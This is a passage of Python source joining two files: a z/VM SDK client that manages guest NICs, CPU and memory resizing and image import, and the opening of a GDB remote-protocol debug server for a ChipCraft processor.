(error.results['rs'] == 16))): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=14, osa=OSA_device, userid=userid, msg=errmsg) else: raise error def _dedicate_OSA(self, userid, OSA_device, vdev, active=False): if active: self._is_active(userid) msg = ('Start to dedicate nic device %(vdev)s of guest %(vm)s ' 'to OSA device %(osa)s' % {'vdev': vdev, 'vm': userid, 'osa': OSA_device}) LOG.info(msg) def_vdev = vdev att_OSA_device = OSA_device for i in range(3): requestData = ' '.join(( 'SMAPI %s API Image_Device_Dedicate_DM' % userid, "--operands", "-v %s" % def_vdev, "-r %s" % att_OSA_device)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err: LOG.error("Failed to dedicate OSA %s to nic %s for user %s " "in the guest's user direct, error: %s" % (att_OSA_device, def_vdev, userid, err.format_message())) # TODO revoke the dedicated OSA in user direct while (int(def_vdev, 16) != int(vdev, 16)): def_vdev = str(hex(int(def_vdev, 16) - 1))[2:] requestData = ' '.join(( 'SMAPI %s API Image_Device_Undedicate_DM' % userid, "--operands", "-v %s" % def_vdev)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err2: if ((err2.results['rc'] == 404) and (err2.results['rs'] == 8)): pass else: LOG.error("Failed to Undedicate nic %s for user" " %s in the guest's user direct, " "error: %s" % (def_vdev, userid, err2.format_message())) pass self._dedicate_OSA_inactive_exception(err, userid, vdev, OSA_device) def_vdev = str(hex(int(def_vdev, 16) + 1))[2:] att_OSA_device = str(hex(int(att_OSA_device, 16) + 1))[2:] if active: def_vdev = vdev att_OSA_device = OSA_device for i in range(3): requestData = ' '.join(( 'SMAPI %s API Image_Device_Dedicate' % userid, "--operands", "-v %s" % def_vdev, "-r %s" % att_OSA_device)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err: LOG.error("Failed to dedicate OSA %s to nic %s for user " "%s on the active guest system, error: %s" % (att_OSA_device, def_vdev, userid, err.format_message())) # TODO revoke the dedicated OSA in user direct and active detach_vdev = vdev for j in range(3): requestData = ' '.join(( 'SMAPI %s API Image_Device_Undedicate_DM' % userid, "--operands", "-v %s" % detach_vdev)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err2: if ((err2.results['rc'] == 404) and (err2.results['rs'] == 8)): pass else: LOG.error("Failed to Undedicate nic %s for " "user %s in the guest's user " "direct, error: %s" % (def_vdev, userid, err2.format_message())) pass detach_vdev = str(hex(int(detach_vdev, 16) + 1))[2:] while (int(def_vdev, 16) != int(vdev, 16)): def_vdev = str(hex(int(def_vdev, 16) - 1))[2:] requestData = ' '.join(( 'SMAPI %s API Image_Device_Undedicate' % userid, "--operands", "-v %s" % def_vdev)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err3: if ((err3.results['rc'] == 204) and (err3.results['rs'] == 8)): pass else: LOG.error("Failed to Undedicate nic %s for " "user %s on the active guest " "system, error: %s" % (def_vdev, userid, err3.format_message())) pass self._dedicate_OSA_active_exception(err, userid, OSA_device) def_vdev = str(hex(int(def_vdev, 16) + 1))[2:] att_OSA_device = str(hex(int(att_OSA_device, 16) + 1))[2:] OSA_desc = 'OSA=%s' % OSA_device self._NetDbOperator.switch_add_record(userid, vdev, comments=OSA_desc) msg = ('Dedicate nic device 
%(vdev)s of guest %(vm)s ' 'to OSA device %(osa)s successfully' % {'vdev': vdev, 'vm': userid, 'osa': OSA_device}) LOG.info(msg) def _undedicate_nic_active_exception(self, error, userid, vdev): if ((error.results['rc'] == 204) and (error.results['rs'] == 44)): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=16, userid=userid, vdev=vdev, msg=errmsg) else: raise error def _undedicate_nic_inactive_exception(self, error, userid, vdev): if ((error.results['rc'] == 400) and (error.results['rs'] == 12)): obj_desc = "Guest %s" % userid raise exception.SDKConflictError(modID='network', rs=17, userid=userid, vdev=vdev, obj=obj_desc) else: raise error def _undedicate_nic(self, userid, vdev, active=False, del_active_only=False): if active: self._is_active(userid) msg = ('Start to undedicate nic device %(vdev)s of guest %(vm)s' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) if not del_active_only: def_vdev = vdev for i in range(3): requestData = ' '.join(( 'SMAPI %s API Image_Device_Undedicate_DM' % userid, "--operands", "-v %s" % def_vdev)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err: results = err.results emsg = err.format_message() if ((results['rc'] == 404) and (results['rs'] == 8)): LOG.warning("Virtual device %s does not exist in " "the guest's user direct", vdev) else: LOG.error("Failed to undedicate nic %s for %s in " "the guest's user direct, error: %s" % (vdev, userid, emsg)) self._undedicate_nic_inactive_exception(err, userid, vdev) def_vdev = str(hex(int(def_vdev, 16) + 1))[2:] self._NetDbOperator.switch_delete_record_for_nic(userid, vdev) if active: def_vdev = vdev for i in range(3): rd = ' '.join(( "SMAPI %s API Image_Device_Undedicate" % userid, "--operands", '-v %s' % def_vdev)) try: self._request(rd) except exception.SDKSMTRequestFailed as err: results = err.results emsg = err.format_message() if ((results['rc'] == 204) and (results['rs'] == 8)): LOG.warning("Virtual device %s does not exist on " "the active guest system", vdev) else: LOG.error("Failed to undedicate nic %s for %s on " "the active guest system, error: %s" % (vdev, userid, emsg)) self._undedicate_nic_active_exception(err, userid, vdev) def_vdev = str(hex(int(def_vdev, 16) + 1))[2:] msg = ('Undedicate nic device %(vdev)s of guest %(vm)s successfully' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) def _request_with_error_ignored(self, rd): """Send smt request, log and ignore any errors.""" try: return self._request(rd) except Exception as err: # log as warning and ignore namelist operation failures LOG.warning(six.text_type(err)) def namelist_add(self, namelist, userid): rd = ''.join(("SMAPI %s API Name_List_Add " % namelist, "--operands -n %s" % userid)) self._request_with_error_ignored(rd) def namelist_remove(self, namelist, userid): rd = ''.join(("SMAPI %s API Name_List_Remove " % namelist, "--operands -n %s" % userid)) self._request_with_error_ignored(rd) def namelist_query(self, namelist): rd = "SMAPI %s API Name_List_Query" % namelist resp = self._request_with_error_ignored(rd) if resp is not None: return resp['response'] else: return [] def namelist_destroy(self, namelist): rd = "SMAPI %s API Name_List_Destroy" % namelist self._request_with_error_ignored(rd) def _get_defined_cpu_addrs(self, userid): user_direct = self.get_user_direct(userid) defined_addrs = [] max_cpus = 0 for ent in user_direct: if ent.startswith("CPU"): cpu_addr = ent.split()[1].strip().upper() defined_addrs.append(cpu_addr) if ent.startswith("MACHINE 
ESA"): max_cpus = int(ent.split()[2].strip()) return (max_cpus, defined_addrs) def _get_available_cpu_addrs(self, used_addrs, max_cpus): # Get available CPU addresses that are not defined in user entry used_set = set(used_addrs) available_addrs = set([hex(i)[2:].rjust(2, '0').upper() for i in range(0, max_cpus)]) available_addrs.difference_update(used_set) return list(available_addrs) def _get_active_cpu_addrs(self, userid): # Get the active cpu addrs in two-digit hex string in upper case # Sample output for 'lscpu --parse=ADDRESS': # # The following is the parsable format, which can be fed to other # # programs. Each different item in every column has an unique ID # # starting from zero. # # Address # 0 # 1 active_addrs = [] active_cpus = self.execute_cmd(userid, "lscpu --parse=ADDRESS") for c in active_cpus: # Skip the comment lines at beginning if c.startswith("# "): continue addr = hex(int(c.strip()))[2:].rjust(2, '0').upper() active_addrs.append(addr) return active_addrs def resize_cpus(self, userid, count): # Check defined cpus in user entry. If greater than requested, then # delete cpus. Otherwise, add new cpus. # Return value: for revert usage, a tuple of # action: The action taken for this resize, possible values: # 0: no action, 1: add cpu, 2: delete cpu # cpu_addrs: list of influenced cpu addrs action = 0 updated_addrs = [] (max_cpus, defined_addrs) = self._get_defined_cpu_addrs(userid) defined_count = len(defined_addrs) # Check maximum cpu count defined if max_cpus == 0: LOG.error("Resize for guest '%s' can't be done. The maximum " "number of cpus is not defined in user directory." % userid) raise exception.SDKConflictError(modID='guest', rs=3, userid=userid) # Check the requested count does not exceed the maximum cpus if count > max_cpus: LOG.error("Resize for guest '%s' can't be done. The " "requested number of cpus: '%i' exceeds the maximum " "number of cpus allowed: '%i'." % (userid, count, max_cpus)) raise exception.SDKConflictError(modID='guest', rs=4, userid=userid, req=count, max=max_cpus) # Check count and take action if defined_count == count: LOG.info("The number of currently defined CPUs in user '%s' equals " "the requested count: %i, no action for static resize " "needed." 
% (userid, count)) return (action, updated_addrs, max_cpus) elif defined_count < count: action = 1 # add more CPUs available_addrs = self._get_available_cpu_addrs(defined_addrs, max_cpus) # sort the list and get the first few addrs to use available_addrs.sort() # Define new cpus in user directory rd = ''.join(("SMAPI %s API Image_Definition_Update_DM " % userid, "--operands")) updated_addrs = available_addrs[0:count - defined_count] for addr in updated_addrs: rd += (" -k CPU=CPUADDR=%s" % addr) try: self._request(rd) except exception.SDKSMTRequestFailed as e: msg = ("Define new cpus in user directory for '%s' failed with" " SMT error: %s" % (userid, e.format_message())) LOG.error(msg) raise exception.SDKGuestOperationError(rs=6, userid=userid, err=e.format_message()) LOG.info("New CPUs defined in user directory for '%s' " "successfully" % userid) return (action, updated_addrs, max_cpus) else: action = 2 # Delete CPUs defined_addrs.sort() updated_addrs = defined_addrs[-(defined_count - count):] # Delete the last few cpus in user directory rd = ''.join(("SMAPI %s API Image_Definition_Delete_DM " % userid, "--operands")) for addr in updated_addrs: rd += (" -k CPU=CPUADDR=%s" % addr) try: self._request(rd) except exception.SDKSMTRequestFailed as e: msg = ("Delete CPUs in user directory for '%s' failed with" " SMT error: %s" % (userid, e.format_message())) LOG.error(msg) raise exception.SDKGuestOperationError(rs=6, userid=userid, err=e.format_message()) LOG.info("CPUs '%s' deleted from user directory for '%s' " "successfully" % (str(updated_addrs), userid)) return (action, updated_addrs, max_cpus) def live_resize_cpus(self, userid, count): # Get active cpu count and compare with requested count # If request count is smaller than the current count, then report # error and exit immediately. active_addrs = self._get_active_cpu_addrs(userid) active_count = len(active_addrs) if active_count > count: LOG.error("Failed to live resize cpus of guest: %(uid)s, " "current active cpu count: %(cur)i is greater than " "the requested count: %(req)i." % {'uid': userid, 'cur': active_count, 'req': count}) raise exception.SDKConflictError(modID='guest', rs=2, userid=userid, active=active_count, req=count) # Static resize CPUs. (add or delete CPUs from user directory) (action, updated_addrs, max_cpus) = self.resize_cpus(userid, count) if active_count == count: # active count equals to requested LOG.info("Current active cpu count of guest: '%s' equals to the " "requested count: '%i', no more actions needed for " "live resize." % (userid, count)) LOG.info("Live resize cpus for guest: '%s' finished successfully." % userid) return else: # Get the number of cpus to add to active and check address active_free = self._get_available_cpu_addrs(active_addrs, max_cpus) active_free.sort() active_new = active_free[0:count - active_count] # Do live resize # Define new cpus cmd_str = "vmcp def cpu " + ' '.join(active_new) try: self.execute_cmd(userid, cmd_str) except exception.SDKSMTRequestFailed as err1: # rollback and return msg1 = ("Define cpu of guest: '%s' to active failed with . " "error: %s." 
% (userid, err1.format_message())) # Start to do rollback if action == 0: LOG.error(msg1) else: LOG.error(msg1 + (" Will revert the user directory " "change.")) # Combine influenced cpu addrs cpu_entries = "" for addr in updated_addrs: cpu_entries += (" -k CPU=CPUADDR=%s" % addr) rd = '' if action == 1: # Delete added CPUs rd = ''.join(("SMAPI %s API Image_Definition_Delete_DM" % userid, " --operands")) else: # Add deleted CPUs rd = ''.join(("SMAPI %s API Image_Definition_Create_DM" % userid, " --operands")) rd += cpu_entries try: self._request(rd) except exception.SDKSMTRequestFailed as err2: msg = ("Failed to revert user directory change for '" "%s', SMT error: %s" % (userid, err2.format_message())) LOG.error(msg) else: LOG.info("Revert user directory change for '%s' " "successfully." % userid) # Finally raise the exception raise exception.SDKGuestOperationError( rs=7, userid=userid, err=err1.format_message()) # Activate successfully, rescan in Linux layer to hot-plug new cpus LOG.info("Added new CPUs to active configuration of guest '%s'" % userid) try: self.execute_cmd(userid, "chcpu -r") except exception.SDKSMTRequestFailed as err: msg = err.format_message() LOG.error("Rescan cpus to hot-plug new defined cpus for guest: " "'%s' failed with error: %s. No rollback is done and you" "may need to check the status and restart the guest to " "make the defined cpus online." % (userid, msg)) raise exception.SDKGuestOperationError(rs=8, userid=userid, err=msg) LOG.info("Live resize cpus for guest: '%s' finished successfully." % userid) def _get_defined_memory(self, userid): user_direct = self.get_user_direct(userid) defined_mem = max_mem = reserved_mem = -1 for ent in user_direct: # u'USER userid password storage max privclass' if ent.startswith("USER "): fields = ent.split(' ') if len(fields) != 6: # This case should not exist if the target user # is created by zcc and not updated manually by user break defined_mem = int(zvmutils.convert_to_mb(fields[3])) max_mem = int(zvmutils.convert_to_mb(fields[4])) # For legacy guests, the reserved memory may not be defined if ent.startswith("COMMAND DEF STOR RESERVED"): reserved_mem = int(zvmutils.convert_to_mb(ent.split(' ')[4])) return (defined_mem, max_mem, reserved_mem, user_direct) def _replace_user_direct(self, userid, user_entry): # user_entry can be a list or a string entry_str = "" if isinstance(user_entry, list): for ent in user_entry: if ent == "": # skip empty line continue else: entry_str += (ent + '\n') else: entry_str = user_entry tmp_folder = tempfile.mkdtemp() tmp_user_direct = os.path.join(tmp_folder, userid) with open(tmp_user_direct, 'w') as f: f.write(entry_str) rd = ''.join(("SMAPI %s API Image_Replace_DM " % userid, "--operands ", "-f %s" % tmp_user_direct)) try: self._request(rd) except exception.SDKSMTRequestFailed as err1: msg = ("Replace definition of guest '%s' failed with " "SMT error: %s." % (userid, err1.format_message())) LOG.error(msg) LOG.debug("Unlocking the user directory.") rd = ("SMAPI %s API Image_Unlock_DM " % userid) try: self._request(rd) except exception.SDKSMTRequestFailed as err2: # ignore 'not locked' error if ((err2.results['rc'] == 400) and ( err2.results['rs'] == 24)): LOG.debug("Guest '%s' unlocked successfully." % userid) pass else: # just print error and ignore this unlock error msg = ("Unlock definition of guest '%s' failed " "with SMT error: %s" % (userid, err2.format_message())) LOG.error(msg) else: LOG.debug("Guest '%s' unlocked successfully." 
% userid) # at the end, raise the replace error for upper layer to handle raise err1 finally: self._pathutils.clean_temp_folder(tmp_folder) def _lock_user_direct(self, userid): rd = ("SMAPI %s API Image_Lock_DM " % userid) try: self._request(rd) except exception.SDKSMTRequestFailed as e: # ignore the "already locked" error if ((e.results['rc'] == 400) and (e.results['rs'] == 12)): LOG.debug("Image is already unlocked.") else: msg = ("Lock definition of guest '%s' failed with" " SMT error: %s" % (userid, e.format_message())) LOG.error(msg) raise e def resize_memory(self, userid, memory): # Check defined storage in user entry. # Update STORAGE and RESERVED accordingly. size = int(zvmutils.convert_to_mb(memory)) (defined_mem, max_mem, reserved_mem, user_direct) = self._get_defined_memory(userid) # Check max memory is properly defined if max_mem == -1 or reserved_mem == -1: LOG.error("Memory resize for guest '%s' cann't be done." "Failed to get the defined/max/reserved memory size " "from user directory." % userid) raise exception.SDKConflictError(modID='guest', rs=19, userid=userid) action = 0 # Make sure requested size is less than the maximum memory size if size > max_mem: LOG.error("Memory resize for guest '%s' cann't be done. The " "requested memory size: '%im' exceeds the maximum " "size allowed: '%im'." % (userid, size, max_mem)) raise exception.SDKConflictError(modID='guest', rs=20, userid=userid, req=size, max=max_mem) # check if already satisfy request if defined_mem == size: LOG.info("The current defined memory size in user '%s' equals " "to requested size: %im, no action for memory resize " "needed." % (userid, size)) return (action, defined_mem, max_mem, user_direct) else: # set action to 1 to represent that revert need to be done when # live resize failed. action = 1 # get the new reserved memory size new_reserved = max_mem - size # prepare the new user entry content entry_str = "" for ent in user_direct: if ent == '': # Avoid adding an empty line in the entry file # otherwise Image_Replace_DM would return syntax error. continue new_ent = "" if ent.startswith("USER "): fields = ent.split(' ') for i in range(len(fields)): # update fields[3] to new defined size if i != 3: new_ent += (fields[i] + ' ') else: new_ent += (str(size) + 'M ') # remove the last space new_ent = new_ent.strip() elif ent.startswith("COMMAND DEF STOR RESERVED"): new_ent = ("COMMAND DEF STOR RESERVED %iM" % new_reserved) else: new_ent = ent # append this new entry entry_str += (new_ent + '\n') # Lock and replace user definition with the new_entry content try: self._lock_user_direct(userid) except exception.SDKSMTRequestFailed as e: raise exception.SDKGuestOperationError(rs=9, userid=userid, err=e.format_message()) LOG.debug("User directory Locked successfully for guest '%s' " % userid) # Replace user directory try: self._replace_user_direct(userid, entry_str) except exception.SDKSMTRequestFailed as e: raise exception.SDKGuestOperationError(rs=10, userid=userid, err=e.format_message()) # Finally return useful info return (action, defined_mem, max_mem, user_direct) def _revert_user_direct(self, userid, user_entry): # user_entry can be a list or a string try: self._lock_user_direct(userid) except exception.SDKSMTRequestFailed: # print revert error and return msg = ("Failed to revert user direct of guest '%s'." % userid) LOG.error(msg) return LOG.debug("User directory Locked successfully for guest '%s'." 
% userid) # Replace user directory try: self._replace_user_direct(userid, user_entry) except exception.SDKSMTRequestFailed: msg = ("Failed to revert user direct of guest '%s'." % userid) LOG.error(msg) return LOG.debug("User directory reverted successfully for guest '%s'." % userid) def _get_active_memory(self, userid): # Return an integer value representing the active memory size in mb output = self.execute_cmd(userid, "lsmem") # cmd output contains following line: # Total online memory : 8192 MB active_mem = 0 for e in output: if e.startswith("Total online memory : "): try: mem_info = e.split(' : ')[1].split(' ') # sample mem_info: [u'2048', u'MB'] active_mem = int(zvmutils.convert_to_mb(mem_info[0] + mem_info[1][0])) except (IndexError, ValueError, KeyError, TypeError): errmsg = ("Failed to get active storage size for guest: %s" % userid) LOG.error(errmsg) raise exception.SDKInternalError(msg=errmsg) break return active_mem def live_resize_memory(self, userid, memory): # Get active memory size and compare with requested size # If request size is smaller than the current size, then report # error and exit immediately. size = int(zvmutils.convert_to_mb(memory)) active_size = self._get_active_memory(userid) if active_size > size: LOG.error("Failed to live resize memory of guest: %(uid)s, " "current active memory size: %(cur)im is greater than " "the requested size: %(req)im." % {'uid': userid, 'cur': active_size, 'req': size}) raise exception.SDKConflictError(modID='guest', rs=18, userid=userid, active=active_size, req=size) # Static resize memory. (increase/decrease memory from user directory) (action, defined_mem, max_mem, user_direct) = self.resize_memory(userid, memory) # Compare active size and requested size, then update accordingly if active_size == size: # online memory already satisfied LOG.info("Current active memory size of guest: '%s' equals to the " "requested size: '%iM', no more actions needed for " "live resize." % (userid, size)) LOG.info("Live resize memory for guest: '%s' finished " "successfully." % userid) return else: # Do live resize. update memory size increase_size = size - active_size # Step1: Define new standby storage cmd_str = ("vmcp def storage standby %sM" % increase_size) try: self.execute_cmd(userid, cmd_str) except exception.SDKSMTRequestFailed as e: # rollback and return msg = ("Define standby memory of guest: '%s' failed with " "error: %s." % (userid, e.format_message())) LOG.error(msg) # Start to do rollback if action == 1: LOG.debug("Start to revert user definition of guest '%s'." % userid) self._revert_user_direct(userid, user_direct) # Finally, raise the error and exit raise exception.SDKGuestOperationError(rs=11, userid=userid, err=e.format_message()) # Step 2: Online new memory cmd_str = ("chmem -e %sM" % increase_size) try: self.execute_cmd(userid, cmd_str) except exception.SDKSMTRequestFailed as err1: # rollback and return msg1 = ("Online memory of guest: '%s' failed with " "error: %s." % (userid, err1.format_message())) LOG.error(msg1) # Start to do rollback LOG.info("Start to do revert.") LOG.debug("Reverting the standby memory.") try: self.execute_cmd(userid, "vmcp def storage standby 0M") except exception.SDKSMTRequestFailed as err2: # print revert error info and continue msg2 = ("Revert standby memory of guest: '%s' failed with " "error: %s." % (userid, err2.format_message())) LOG.error(msg2) # Continue to do the user directory change. if action == 1: LOG.debug("Reverting the user directory change of guest " "'%s'." 
% userid) self._revert_user_direct(userid, user_direct) # Finally raise the exception raise exception.SDKGuestOperationError( rs=7, userid=userid, err=err1.format_message()) LOG.info("Live resize memory for guest: '%s' finished successfully." % userid) class FilesystemBackend(object): @classmethod def image_import(cls, image_name, url, target, **kwargs): """Import image from remote host to local image repository using scp. If remote_host not specified, it means the source file exist in local file system, just copy the image to image repository """ source = urlparse.urlparse(url).path if kwargs['remote_host']: if '@' in kwargs['remote_host']: source_path = ':'.join([kwargs['remote_host'], source]) command = ' '.join(['/usr/bin/scp', "-P", CONF.zvm.remotehost_sshd_port, "-o StrictHostKeyChecking=no", '-r ', source_path, target]) (rc, output) = zvmutils.execute(command) if rc: msg = ("Copying image file from remote filesystem failed" " with reason: %s" % output) LOG.error(msg) raise exception.SDKImageOperationError(rs=10, err=output) else: msg = ("The specified remote_host %s format invalid" % kwargs['remote_host']) LOG.error(msg) raise exception.SDKImageOperationError(rs=11, rh=kwargs['remote_host']) else: LOG.debug("Remote_host not specified, will copy from local") try: shutil.copyfile(source, target) except Exception as err: msg = ("Import image from local file system failed" " with reason %s" % six.text_type(err)) LOG.error(msg) raise exception.SDKImageOperationError(rs=12, err=six.text_type(err)) @classmethod def image_export(cls, source_path, dest_url, **kwargs): """Export the specific image to remote host or local file system """ dest_path = urlparse.urlparse(dest_url).path if kwargs['remote_host']: target_path = ':'.join([kwargs['remote_host'], dest_path]) command = ' '.join(['/usr/bin/scp', "-P", CONF.zvm.remotehost_sshd_port, "-o StrictHostKeyChecking=no", '-r ', source_path, target_path]) (rc, output) = zvmutils.execute(command) if rc: msg = ("Error happened when copying image file to remote " "host with reason: %s" % output) LOG.error(msg) raise exception.SDKImageOperationError(rs=21, msg=output) else: # Copy to local file system LOG.debug("Remote_host not specified, will copy to local server") try: shutil.copyfile(source_path, dest_path) except Exception as err: msg = ("Export image from %(src)s to local file system" " %(dest)s failed: %(err)s" % {'src': source_path, 'dest': dest_path, 'err': six.text_type(err)}) LOG.error(msg) raise exception.SDKImageOperationError(rs=22, err=six.text_type(err)) class HTTPBackend(object): @classmethod def image_import(cls, image_name, url, target, **kwargs): import_image = MultiThreadDownloader(image_name, url, target) import_image.run() class MultiThreadDownloader(threading.Thread): def __init__(self, image_name, url, target): super(MultiThreadDownloader, self).__init__() self.url = url # Set thread number self.threadnum = 8 r = requests.head(self.url) # Get the size of the download resource self.totalsize = int(r.headers['Content-Length']) self.target = target def handle_download_errors(func): @functools.wraps(func) def wrapper(self, *args, **kwargs): try: return func(self, *args, **kwargs) except Exception as err: self.fd.close() msg = ("Download image from http server failed: %s" % six.text_type(err)) LOG.error(msg) raise exception.SDKImageOperationError(rs=9, err=six.text_type(err)) return wrapper def get_range(self): ranges = [] offset = int(self.totalsize / self.threadnum) for i in range(self.threadnum): if i == self.threadnum - 1: 
ranges.append((i * offset, '')) else: # Get the process range for each thread ranges.append((i * offset, (i + 1) * offset)) return ranges def download(self, start, end): headers = {'Range': 'Bytes=%s-%s' % (start, end), 'Accept-Encoding': '*'} # Get the data res = requests.get(self.url, headers=headers) # seek to the right position for writing data LOG.debug("Downloading file range %s:%s success" % (start, end)) with _LOCK: self.fd.seek(start) self.fd.write(res.content) @handle_download_errors def run(self): self.fd = open(self.target, 'w') thread_list = [] n = 0 for ran in self.get_range(): start, end = ran LOG.debug('thread %d start:%s,end:%s' % (n, start, end)) n += 1 # Open thread thread = threading.Thread(target=self.download, args=(start, end)) thread.start() thread_list.append(thread) for i in thread_list: i.join() LOG.info('Download %s success' % (self.name)) self.fd.close()
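# --- Illustrative sketch (not part of the original module) -----------------
# MultiThreadDownloader above splits the resource into one byte range per
# thread and fetches each range with an HTTP 'Range' header.  The helper below
# is a minimal, standalone sketch of that range-splitting step, assuming the
# same convention that the last range is left open-ended ('').  The name
# split_ranges and the demo sizes are hypothetical, for illustration only.
def split_ranges(total_size, parts):
    """Return a list of (start, end) byte offsets; the last end is ''."""
    offset = total_size // parts
    ranges = []
    for i in range(parts):
        if i == parts - 1:
            # last worker reads from its offset to the end of the resource
            ranges.append((i * offset, ''))
        else:
            ranges.append((i * offset, (i + 1) * offset))
    return ranges


if __name__ == '__main__':
    # e.g. a 10 MiB resource split across 4 workers
    for start, end in split_ranges(10 * 1024 * 1024, 4):
        print('Range: bytes=%s-%s' % (start, end))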
dbgserver.py
#!/usr/bin/env python2 # # Copyright (c) 2017 ChipCraft Sp. z o.o. # # GDB compatible Debug Server for CC Processor # # Author: Rafal Harabien # # $Date: 2020-04-14 16:02:50 +0200 (wto, 14 kwi 2020) $ # $Revision: 547 $ # import time, sys, os, stat, select, threading, logging, re, struct, binascii, socket, serial, getopt, signal is_py2 = sys.version[0] == '2' if is_py2: import Queue as queue else: import queue as queue # Default options GDB_PORT = 3333 DBG_PORT = '/dev/ttyUSB1' DBG_BAUDRATE = 460800 # Constants DEBUG_BREAKPOINTS = 0x90000000 DEBUG_WATCHPOINTS = 0x90000010 DEBUG_BURST_COUNT = 0x90000020 DEBUG_REGS = 0x91000000 MAX_BURST_LEN = 0xFFC BREAKPOINTS_NUM = 4 WATCHPOINTS_NUM = 4 ACK_CHR = b'\6' SIGINT = 2 SIGTRAP = 5 BREAK_OPCODE = b'\x00\x00\x03\xCD' MEM_REGION_ALIGNMENT = 0x10000 class DebuggerDisconnectedException(Exception): """Raised when GDB debugger disconnects from debug server.""" pass class DebuggerInterruptedException(Exception): """Raised when GDB debugger sends interrupt byte (0x03) to stop program execution.""" pass class TargetDisconnectedException(Exception): """Raised when target hardware is disconnected.""" pass class GdbConn: """Represents connection with GDB client. Uses socket for communication. Supports sending and parsing packets in GDB Remote Protocol.""" def __init__(self, sock, cpu_input_thread): self._sock = sock self._buf = b'' self._buf_offset = 0 self._packet_queue = queue.Queue() self._cpu_input_thread = cpu_input_thread self._no_ack_mode = False self._input_thread = threading.Thread(target=self._input_thread_proc, name='GDB Input') self._input_thread.daemon = True self._input_thread.start() def get_packet(self, timeout=None): while True: data = self._get_from_queue(timeout) if data not in [b'+', b'-']: return data logging.warn('Expected GDB packet, got ACK (%s)', data) def _get_from_queue(self, timeout=None): if not self._packet_queue: # Got EOF before logging.debug('Got EOF from GDB before') return None try: data = self._packet_queue.get(timeout != 0, timeout) if not data: logging.debug('Got EOF from GDB') self._packet_queue = None self._input_thread = None return data except queue.Empty: logging.debug('Timeout when reading GDB input queue (%s)', timeout) return None def send_packet(self, data): packet = self._prepare_packet(data) while True: logging.debug('Sending GDB packet: %s', packet) self._write(packet) if self._no_ack_mode: return True ack = self._get_from_queue(timeout=5) if not ack: logging.warning('Failed to read ACK from GDB') return False elif ack == b'+': logging.debug('Received ACK from GDB') return True else: logging.warning('Expected ACK from GDB, got \'%s\' (%s) (packet %s)', ack, binascii.hexlify(ack), packet) def _input_thread_proc(self): try: while True: data = self._read_packet() if data == b'\3': self._cpu_input_thread.put_interrupt() else: self._packet_queue.put(data) if not data: self._cpu_input_thread.put_exit_flag() if not data or data == b'D': logging.debug('Ending GDB input thread') self._packet_queue = None break except: logging.exception('Uncaught exception') def _read_byte(self): if self._buf_offset == len(self._buf): self._buf = self._read() self._buf_offset = 0 if self._buf: self._buf_offset = self._buf_offset + 1 return self._buf[self._buf_offset - 1:self._buf_offset] def _read_packet(self): in_packet = False while True: ch = self._read_byte() if not ch: # EOF logging.debug('Got EOF from GDB in _read_packet') return None if ch == b'$': data = b'' checksum = 0 in_packet = True elif not in_packet: if ch in [b'\3', 
b'+', b'-']: # Interrupt, ACK, NACK logging.debug('Got special byte %s from GDB', ch) return ch else: logging.warn('Ignoring non-packet byte %s', ch) elif ch == b'#': ch1 = self._read_byte() ch2 = self._read_byte() if not ch1 or not ch2: logging.error('Failed to read packet checksum') return None xmitcsum = int(ch1 + ch2, 16) checksum = checksum % 256 if checksum == xmitcsum: break # success else: logging.warning('Invalid checksum (0x%X != 0x%X)', checksum, xmitcsum) self._write(b'-') in_packet = False else: data = data + ch checksum += ord(ch) # send ACK if not self._no_ack_mode: self._write(b'+') # unescape binary data and return escape_pattern = re.compile(b'\x7D(.)', flags=re.DOTALL) data = escape_pattern.sub(lambda m: bytes(bytearray((ord(m.group(1)) ^ 0x20,))), data) return data def _prepare_packet(self, data): checksum = 0 for b in data: checksum += ord(b) if is_py2 else b checksum = checksum % 256 return b'$' + data + b'#' + ('%02X' % checksum).encode('ascii') def _read(self): if self._sock: return self._sock.recv(1024) elif hasattr(sys.stdin, 'buffer'): return sys.stdin.buffer.read(1) else: return sys.stdin.read(1) def _write(self, data): if self._sock: self._sock.send(data) elif hasattr(sys.stdout, 'buffer'): sys.stdout.buffer.write(data) sys.stdout.flush() else: sys.stdout.write(data) sys.stdout.flush() def start_no_ack_mode(self): self._no_ack_mode = True class StreamLoggingWrapper: """Serial Port proxy with logging support.""" def __init__(self, inner, log_path=None): self._inner = inner self._log_path = log_path self._log_file = None if self._log_path: self._log_file = open(self._log_path, 'wb') def write(self, data): if logging.getLogger().isEnabledFor(logging.DEBUG): # dont hexlify if not needed logging.debug('Serial Write: %s %s', binascii.hexlify(data).decode('ascii'), binascii.b2a_qp(data)) if self._log_file: self._log_file.write(data + b'\n') return self._inner.write(data) def read(self, size=1): data = self._inner.read(size) if logging.getLogger().isEnabledFor(logging.DEBUG): # dont hexlify if not needed logging.debug('Serial Read: %s %s', binascii.hexlify(data).decode('ascii'), binascii.b2a_qp(data)) return data def close(self): self._inner.close() if self._log_file: self._log_file.close() self._log_file = None class CpuInputThread(threading.Thread): def __init__(self, serial): threading.Thread.__init__(self) self._serial = serial self._queue = queue.Queue() self.closing = False self._debugger_disconnected_flag = False self._interrupted_flag = False self._target_disconnected_flag = False def run(self): try: while True: if self.closing: logging.debug('Close request in CpuInputThread - exiting') break try: data = self._serial.read() except serial.SerialException as e: if not self.closing: logging.error('Serial exception: %s', e) else: logging.debug('Ending CPU input thread after port close') break if data: self._queue.put(data) else: logging.debug('Ending CPU input thread - read returned 0') break self._target_disconnected_flag = True self._queue.put('') except: logging.exception('Uncaught exception') def get_byte(self, timeout=None, interruptible=False): try: if interruptible: self._check_flags() data = self._queue.get(timeout != 0, timeout) if not data and interruptible: self._check_flags() return data except queue.Empty: logging.debug('Timeout when reading CPU queue (%s)', timeout) return None def put_interrupt(self): logging.debug('Adding interrupt flag to CPU queue') self._interrupted_flag = True self._queue.put('') def put_exit_flag(self): logging.debug('Adding 
